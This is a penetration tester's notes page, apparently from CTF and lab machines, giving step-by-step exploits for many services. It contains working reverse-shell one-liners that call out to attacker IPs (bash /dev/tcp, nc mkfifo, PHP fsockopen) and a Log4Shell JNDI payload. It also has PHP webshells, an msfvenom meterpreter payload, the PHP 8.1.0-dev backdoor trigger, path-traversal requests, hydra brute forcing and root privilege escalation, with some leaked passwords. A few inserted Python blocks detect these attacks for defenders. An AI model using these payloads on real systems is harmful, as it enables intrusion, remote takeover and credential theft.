Things I have Pwn'd before
tl;dr: This page tracks things I have pwn'd before with public exploits
https://ippsec.rocks/?#
Unifi Log4Shell
Unifi Network 6.4.54
Testing: capture an auth attempt in Burp with the creds test:test
Start tcpdump on your host station:
sudo tcpdump -i tun0 port 389

The server will respond with
invalid payload
however it is still connecting back to us; check tcpdump to confirm the connect-back.

Now install the required packages:
sudo apt update
sudo apt install openjdk-11-jdk -y
java -version
sudo apt-get install maven
mvn -v
After the payload has been created, start the Rogue-JNDI application, passing the payload to the --command option and your tun0 IP address to the --hostname option.
git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package
echo 'bash -c bash -i >&/dev/tcp/10.10.15.96/9001 0>&1' | base64
java -jar /opt/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuOTYvOTAwMSAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.15.96"
--hostname is your local tun0 interface. Now start your listener.
Going back to our intercepted POST request, let's change the payload to
${jndi:ldap://{Your Tun0 IP}:1389/o=tomcat}
and click Send
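Detection side of the Unifi Log4Shell flow above, as an added example that is not part of the original notes: it finds the ${jndi:...} lookup in login request bodies (URL-encoded ones too), pulls out the callback host and port, and lists the egress you would expect the tcpdump on port 389/1389 to show. The sample bodies are constructed here, and the JSON field that carries the lookup is an assumption.

```python
import re
from urllib.parse import unquote

# Matches a JNDI lookup such as ${jndi:ldap://10.10.15.96:1389/o=tomcat}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}]+)(?::(?P<port>\d+))?(?P<path>[^}]*)\}",
    re.IGNORECASE,
)

def find_jndi_lookups(text):
    """Return one dict per JNDI lookup found in text (scheme, host, port, path).
    The text is percent-decoded first so URL-encoded parameters are covered too."""
    hits = []
    for m in JNDI_RE.finditer(unquote(text)):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path"),
        })
    return hits

def expected_egress(text):
    """Callback endpoints a vulnerable server would connect to (LDAP default 389).
    These are the pivot for correlating the request log with firewall/flow records."""
    return sorted({(h["host"], h["port"] or 389) for h in find_jndi_lookups(text)})

# Constructed sample bodies for the UniFi login endpoint (not captured traffic).
# Which JSON field carries the lookup is an assumption; the detector does not care.
SAMPLE_BODIES = [
    '{"username":"test","password":"test","remember":"${jndi:ldap://10.10.15.96:1389/o=tomcat}","strict":true}',
    '{"username":"test","password":"test","remember":false,"strict":true}',
    'remember=%24%7Bjndi%3Aldap%3A%2F%2F10.10.15.96%3A1389%2Fo%3Dtomcat%7D',
]

def triage(bodies):
    """Index of each body that contains a lookup, with the egress it would cause."""
    return [(i, expected_egress(b)) for i, b in enumerate(bodies) if find_jndi_lookups(b)]
```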
Apache Struts2
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-title: Santa Naughty and Nice Tracker
USE:
search struts2
exploit(multi/http/struts2_content_type_ognl)
Microsoft-ds port 445
445/tcp open microsoft-ds
Run the nmap smb-vuln scripts
USE:
nmap --script=smb-vuln* $ip
exploit(windows/smb/ms08_067_netapi)
exploit(windows/smb/ms17_010_eternalblue)
Wing FTP Server
21/tcp open wingftp
Gain access to the admin panel
search lua
exploit(windows/ftp/wing_ftp_admin_exec)
Mantis Bug Tracker
80/tcp open http mantisbt-2.3.0
CVE-2019-15715, CVE-2017-7615
Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
James POP3
110/tcp open POP3
James POP3 Server 2.3.2
https://www.exploit-db.com/exploits/35513
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc 172.16.6.2 3333 >/tmp/f
echo "#!/bin/bash" > /etc/init.d/james
echo "bash -i >& /dev/tcp/172.16.6.2/5555 0>&1" >> /etc/init.d/james
cat /etc/init.d/james
sudo /sbin/reboot
Kibana
5601 is the Kibana (Elastic stack front end) port, 9200 is the Elasticsearch API
curl -X GET "10.10.15.175:9200/_search?q=password&pretty"
{
"took" : 11,
"timed_out" : false,
"_shards" : {
"total" : 6,
"successful" : 6,
"skipped" : 0,
"failed" : 0
},
"hits" : {
"total" : 1,
"max_score" : 2.0136302,
"hits" : [
{
"_index" : "messages",
"_type" : "_doc",
"_id" : "73",
"_score" : 2.0136302,
"_source" : {
"sender" : "mary",
"receiver" : "wendy",
"message" : "hey, can you access my dev account for me. My username is l33tperson and my password is 9Qs58Ol3AXkMWLxiEyUyyf"
If there are exposed log files, like the live Kibana logs on port 8000 here, there may be an LFI vulnerability.
Go to port 5601 and append this path:
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
10.10.156.71:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt
Then curl the logs and grep for root.txt
curl -s http://10.10.31.117:8000/kibana-log.txt | grep "root.txt"
Can also be used to get a shell in other situations
https://github.com/mpgn/CVE-2018-17246
Sync Breeze Enterprise
Sync Breeze Enterprise v8.9.24
https://www.exploit-db.com/exploits/40456
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=172.16.6.1 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
Microsoft ds
exploit/windows/smb/ms17_010_eternalblue
Android
5555/tcp open freeciv
Install adb
adb connect [target ip address:port]
Joomla versions 3.6.3
Able to use joom.py to create an account and log in
python3 joom.py -u jack -p password -e [email protected] http://10.10.10.10
Edit the templates
Add in webshell
Can read the config files, which have the username and password, then ssh in
XAMPP
Got in through phpmyadmin [root:no password]
Able to get shell through SQL database commands
SELECT "<?php echo shell_exec($_GET['cmd']); ?>" into outfile "C:/xampp/htdocs/xampp/shell.php";
Then browse to:
10.10.10.10/xampp/shell.php?cmd=dir
Look for config files with passwords
C:\xampp\htdocs\admin\config.php
Lucky GetSimple!
10.16.1.2/data/users/lucky.xml
See the config file and passwd hash with username, crack in john
PE with dirtycow [CVE-2016-5195]
Compile with
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
Dolphin Wordpress
Dolphin <7.3.2 Auth bypass / RCE exploit by Ahmed Sultan
Codiad Impresscms
10.10.10.10/codiad/data/users.php
Directories found
/config.php
/data
/workspace
Upload web shell
Found SSH creds
Techblog (Wordpress Siteimport Exploit)
LFI
http://10.16.1.3/wp-content/plugins/site-import/readme.txt
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://10.16.1.3/wp-content/plugins/site-import/admin/page.php?url=../../../../../../../../../../etc/passwd
wp-config.php has the login creds
Backupadmin
Priv esc on a box with Amanda running, found via the LFI exploit
fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
ls -al /usr/lib/amanda
echo '#!/bin/sh
/bin/sh' > priv.sh
chmod +x priv.sh
/usr/lib/amanda/application/amstar restore --star-path=/tmp/priv.sh
$ whoami
root
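The Kibana, Techblog site-import and Backupadmin fileinfo.php entries above all hinge on the same path-traversal pattern, just spelled three ways (../, ..\ and %2F-encoded). This added example, not from the original notes, normalizes a request target (bounded repeated percent-decoding, Windows separators folded) and flags access-log lines whose target climbs directories; the log lines are constructed from the requests on this page.

```python
import re
from urllib.parse import unquote

TRAVERSAL_RUN = re.compile(r"(?:\.\./)+")
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize_target(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded, so double-encoding
    is unwrapped too), then fold Windows separators into '/'."""
    decoded = value
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/")

def traversal_depth(value):
    """Length of the longest consecutive '../' run after normalization; 0 = none."""
    runs = TRAVERSAL_RUN.findall(normalize_target(value))
    return max((len(r) // 3 for r in runs), default=0)

def scan_access_log(lines, threshold=2):
    """Return (line number, depth, normalized target) for each request whose
    target climbs at least `threshold` directories."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        depth = traversal_depth(m.group(1))
        if depth >= threshold:
            findings.append((n, depth, normalize_target(m.group(1))))
    return findings

# Constructed access-log lines (combined format) built from the requests above.
SAMPLE_LOG = [
    '10.10.14.2 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/site-import/readme.txt HTTP/1.1" 200 300',
    r'10.10.14.2 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1" 200 512',
    '10.10.14.2 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-content/plugins/site-import/admin/page.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 200 1024',
    '10.10.14.2 - - [01/Jan/2024:10:00:03 +0000] "GET /fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 900',
    '10.10.14.2 - - [01/Jan/2024:10:00:04 +0000] "GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt HTTP/1.1" 200 40',
]
```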
mysql Brute Force
mysql 3306 running on the target
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.16.1.11
mysql -u root -h 10.16.1.11 -p
SHOW DATABASES;
SHOW TABLES FROM helpdesk;
USE helpdesk;
SELECT * FROM ost_form_entry;
IP Fire 2.15
Brute-force the admin login; the default is [admin:admin]
https://github.com/0xskunk/IPFire-2.15-Shellshock-Exploit/blob/master/SIPS.py
Webmin 1.8.90
MiniServ 1.890 (Webmin httpd)
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
Read /etc/shadow
Add user
Reverse Shells
Read the config files
Will run as root
Webmin 1.900
MiniServ 1.900 (Webmin httpd)
Requires credentials in order to exploit; a Metasploit module can be used once credentials are obtained:
exploit/linux/http/webmin_packageup_rce
PASSWORD Password6543 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.1.17 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME admin yes Webmin Username
cmd/unix/reverse_perl
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
run
[*] Started reverse TCP handler on 10.10.14.2:8888
[+] Session cookie: bda1415ad657230f23aac213aa96a878
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:8888 -> 10.10.110.3:10784) at 2024-04-13 21:21:53 -0400
init.d linux pe
webserv
NAS4Free - web shell via the file editor
Pro FTPD 1.3.5
https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py
TeamCity Linux Priv Esc
Port was only listening locally so had to port forward in order to be able to browse to it
ssh [email protected] -i id_rsa -L 8111:localhost:8111
TeamCity operates on port 8111 by default. Then I could go to localhost:8111 in my browser. I was asked for an authentication token to log in as super user.
In the path /TeamCity/logs I was able to find a file called catalina.out; reading its contents provided me the authentication token:
[TeamCity] Super user authentication token: 8119166573167676780
Once you have gained access, create a new project.
Next fill in the build configuration.
Next click build steps and use the following command to let /bin/bash run with full root privileges. Click save, and then run.
Back to the command line and run:
/bin/bash -p
whoami
root
ClipBucket
File upload vulnerability with authentication
curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/photo_uploader.php"
curl --user developers:9972761drmfsls -F "file=@php_reverse_shell.php" -F "plupload=1" -F "name=php_reverse_shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"
curl --user developers:9972761drmfsls -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php"
The site will tell you the MD5 hash name of the file and the directory it is located in. Make sure to add the .php extension to the end.
PHP 8.1.0-dev
This version of PHP was backdoored.
Detect with nikto or by capturing the server response in Burp:
X-Powered-By: PHP/8.1.0-dev  <-- what you are looking for
Automated POC exploit
Manual Exploitation:
Capture a request in burp suite
Add an additional User-Agentt header to the request (yes, it is supposed to be spelled with two t's). Payload:
User-Agentt: zerodiumsystem('bash -c "bash -i >& /dev/tcp/10.10.14.13/9001 0>&1"');
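Both signs of the backdoored 8.1.0-dev build that the notes above describe, the X-Powered-By fingerprint in responses and the misspelled User-Agentt request header with the zerodium prefix, as an added detection example that is not part of the original page. The HTTP messages are constructed, and the simple header parser assumes CRLF line endings with no header folding.

```python
# Constructed HTTP messages (not real traffic): one response from the
# backdoored build, one clean response, and two requests.
BACKDOORED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
CLEAN_RESPONSE = "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/7.4.3\r\n\r\n"
TRIGGER_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 10.10.10.10\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "User-Agentt: zerodiumsystem('id');\r\n\r\n"
)
NORMAL_REQUEST = "GET / HTTP/1.1\r\nHost: 10.10.10.10\r\nUser-Agent: Mozilla/5.0\r\n\r\n"

def parse_head(raw):
    """Split a raw HTTP message into (start line, {lower-cased name: value}).
    Duplicate header names keep the last value; header folding is not handled."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def is_backdoored_build(raw_response):
    """Fingerprint: the tampered 8.1.0-dev build announces itself in X-Powered-By."""
    _, h = parse_head(raw_response)
    return h.get("x-powered-by", "").lower() == "php/8.1.0-dev"

def is_trigger_request(raw_request):
    """The backdoor reads the misspelled User-Agentt header and runs whatever
    follows the literal 'zerodium' prefix, so that pair is the request signature."""
    _, h = parse_head(raw_request)
    return h.get("user-agentt", "").lower().startswith("zerodium")

def triggered_code(raw_request):
    """Return the PHP that would have been executed (for incident notes), or None."""
    _, h = parse_head(raw_request)
    value = h.get("user-agentt", "")
    return value[len("zerodium"):] if value.lower().startswith("zerodium") else None
```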
Open Net Admin (ona)
Metasploit module for command injection in 18.1.1
Database file with credentials is located here:
/opt/ona/www/local/config/database_settings.inc.php
Wordpress HelloDolly Plugin
https://yebberdog.medium.com/try-hack-me-jack-walkthrough-904035594dc2
- craft shell from hacktricks
- from revshells.com
<?php $sock=fsockopen("10.10.14.2",80);passthru("/bin/bash <&3 >&3 2>&3"); ?>
- update dolly code
File edited successfully.
- now activate it
<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
http://10.10.110.100:65000/wordpress/wp-content/plugins/hello.php?cmd=id
- code execution...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 exploit.py http://crm.board.htb admin admin 10.10.14.53 9001
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.53] from (UNKNOWN) [10.10.11.11] 53264
bash: cannot set terminal process group (858): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
CVE-2022-37706-Enlightenment-0.25.3-LPE
If you see a SUID binary called enlightenment_sys: in order to exploit it, I've had to alter the script
# change below
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
# to this (no line breaks)
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
./poc.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Welcome to the rabbit hole :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
#
Pluck CMS 4.7.18
https://www.exploit-db.com/raw/49909
https://codingninjablogs.tech/tryhackme-dreaming-pluck-cms-44575d7e558a
User Input:
target_ip = sys.argv[1]
target_port = sys.argv[2]
password = sys.argv[3]
pluckcmspath = sys.argv[4]
python3 exploit.py greenhorn.htb 80 iloveyou1 /
Authentification was succesfull, uploading webshell
Uploaded Webshell to:
http://greenhorn.htb:80//files/shell.phar
data/inc/files.php: $blockedExtentions = array('.php','php3','php4','php5','php6','php7','phtml','.phtm','.pht','.ph3','.ph4','.ph5','.asp','.cgi','.phar');
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
file upload is not working well
https://www.youtube.com/watch?v=GpL_rz8jgro
zip test.zip php-rev.php
adding: php-rev.php (deflated 59%)
upload the zip
De-pixel PDF to find password
Depixelate the file to get the password
https://pdf2png.com/
// tool
https://github.com/spipm/Depix
python3 depix.py \
-p ../../image_page_1_1.png \
-s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-25 19:31:34,915 - Loading pixelated image from ../../image_page_1_1.png
2024-07-25 19:31:34,929 - Loading search image from images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-07-25 19:31:35,788 - Finding color rectangles from pixelated space
2024-07-25 19:31:35,790 - Found 252 same color rectangles
2024-07-25 19:31:35,790 - 190 rectangles left after moot filter
2024-07-25 19:31:35,790 - Found 1 different rectangle sizes
2024-07-25 19:31:35,790 - Finding matches in search image
2024-07-25 19:31:35,790 - Scanning 190 blocks with size (5, 5)
2024-07-25 19:31:35,829 - Scanning in searchImage: 0/1674